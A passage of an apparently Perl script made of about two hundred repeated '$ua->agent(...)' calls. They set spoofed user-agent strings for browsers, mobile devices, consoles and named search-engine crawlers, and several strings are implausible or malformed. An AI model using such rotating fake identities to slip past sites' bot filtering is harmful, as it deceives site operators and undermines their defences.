  5069. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5070. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5071. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5072. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5073. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5074. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5075. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5076. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5077. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5078. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  5079. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  5080. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5081. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5082. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5083. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5084. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5085. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5086. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5087. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5088. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5089. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5090. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5091. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5092. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5093. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5094. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5095. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5096. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5097. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5098. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5099. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5100. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5101. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5102. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5103. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5104. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5105. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5106. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5107. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5108. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5109. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5110. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5111. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5112. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5113. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5114. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5115. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5116. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5117. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5118. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5119. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5120. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5121. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5122. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5123. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5124. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5125. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5126. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5127. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5128. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5129. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5130. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5131. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5132. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5133. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5134. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5135. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5136. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5137. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5138. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5139. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5140. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5141. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5142. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5143. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5144. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5145. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5146. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5147. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5148. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5149. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5150. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5151. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5152. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5153. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5154. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5155. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5156. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5157. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5158. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5159. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5160. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5161. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5162. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5163. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5164. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5165. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5166. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5167. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5168. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5169. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5170. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5171. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5172. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5173. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5174. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5175. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5176. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5177. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5178. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5179. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5180. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5181. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  5182. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  5183. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  5184. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  5185. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  5186. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5187. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5188. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  5189. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  5190. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  5191. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  5192. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  5193. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5194. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5195. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5196. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5197. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  5198. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5199. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  5200. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  5201. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  5202. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  5203. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5204. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  5205. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  5206. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  5207. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  5208. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  5209. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  5210. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  5211. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  5212. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  5213. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  5214. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  5215. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5216. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5217. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  5218. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  5219. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  5220. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  5221. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5222. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  5223. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5224. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  5225. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  5226. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  5227. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  5228. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  5229. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  5230. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  5231. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  5232. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  5233. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5234. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5235. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5236. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5237. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5238. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5239. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5240. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5241. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5242. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5243. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5244. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5245. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5246. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5247. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5248. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5249. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5250. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5251. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5252. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5253. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5254. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5255. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5256. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5257. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5258. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5259. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5260. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5261. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5262. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5263. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5264. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
